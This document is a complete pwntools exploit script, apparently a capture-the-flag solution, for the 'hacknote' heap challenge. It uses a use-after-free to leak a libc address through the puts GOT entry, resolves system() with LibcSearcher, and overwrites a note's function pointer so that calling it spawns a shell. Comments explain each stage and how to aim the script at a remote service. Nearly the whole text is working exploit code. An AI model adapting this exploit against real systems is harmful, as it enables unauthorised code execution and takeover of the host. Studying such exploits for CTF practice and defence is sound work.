Heap exploitation: use-after-free (UAF) on `hacknote`
Exploit script (exp)
from pwn import *
from LibcSearcher import *
# Target setup. The local binary is used by default; swap in the remote()
# line to run the same script against the live service (the libc then has
# to match the remote one, see the LibcSearcher step below).
binary_path = "./hacknote"
context.log_level = "debug"
elf = ELF(binary_path)
p = process(binary_path)
#p = remote("node4.buuoj.cn", 27009)
# GOT slot of puts in the (non-PIE) binary; this is what gets leaked.
puts_got = elf.got['puts']
def add(size, content):
    """Menu option 1: create a note of `size` bytes holding `content`.

    `content` is written with send(), not sendline(): no newline is appended,
    so exactly the bytes given are delivered. The payloads later in this
    script depend on that (they are sized to fill the requested chunk).
    """
    p.sendlineafter("Your choice :", '1')
    p.sendlineafter('Note size :', str(size))
    p.recvuntil("Content :")
    p.send(content)
def delete(index):
    """Menu option 2: free note `index`.

    The exploit below calls show(0) after delete(0) and still gets output, so
    the freed note evidently stays reachable through the menu - that dangling
    entry is the use-after-free this script builds on.
    """
    p.sendlineafter('Your choice :', '2')
    p.sendlineafter('Index :', str(index))
def show(index):
    """Menu option 3: print note `index`.

    Used twice: once on a freed-and-reallocated note to leak a GOT entry, and
    once more to trigger the overwritten function pointer.
    """
    p.sendlineafter('Your choice :', '3')
    p.sendlineafter('Index :', str(index))
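# ---- Stage 1: leak a libc address through the dangling note 0 -------------
# Two notes with 0x18-byte contents, then free both. Each note consists of a
# small bookkeeping struct plus its content chunk; after the two deletes the
# next small allocation is served from one of the freed note structs.
# Bytes literals keep this working on both Python 2 and Python 3 pwntools.
add(0x18, b'aaaa')
add(0x18, b'bbbb')
delete(0)
delete(1)
log.info('puts_got:' + hex(puts_got))

# Address of the binary's own note-print routine (fixed, non-PIE binary).
# The new note's 8-byte content is carved out of note 0's freed struct, so we
# rebuild that struct as {print_routine, puts@got}: show(0) then calls the
# print routine on puts@got and prints the resolved libc address of puts.
puts = 0x804862b
payload = p32(puts) + p32(puts_got)
add(8, payload)
show(0)
# recvn(4) blocks until all 4 bytes have arrived; recv(4) may return fewer
# and u32() would then fail (or, worse, a partial read would yield garbage).
puts_addr = u32(p.recvn(4))
log.info("puts_addr:" + hex(puts_addr))

# LibcSearcher looks the libc up by the leaked address's low bits. It can
# match several libc builds and prompt for one; the choice must be the libc
# the *target* actually runs (for the remote service that is not necessarily
# the local one), otherwise system/str_bin_sh offsets below are wrong.
libc = LibcSearcher("puts", puts_addr)
libcbase = puts_addr - libc.dump("puts")
binsh_addr = libcbase + libc.dump("str_bin_sh")  # computed but not used below
system_addr = libcbase + libc.dump("system")
log.info("libcbase:" + hex(libcbase))
log.info("system_addr:" + hex(system_addr))

# ---- Stage 2: turn note 0's function pointer into system() ----------------
# Freeing note 2 returns its content chunk (which overlays note 0's struct)
# to the allocator; the next 8-byte allocation gets it back, so the content
# we write becomes note 0's struct: {system, "||sh"}. show(0) then invokes
# system() with the struct itself as the argument: the first four bytes are
# a bogus command that fails, and `||` makes the shell run "sh".
delete(2)
payload = p32(system_addr) + b'||sh'
add(8, payload)
#gdb.attach(p)
show(0)
p.interactive()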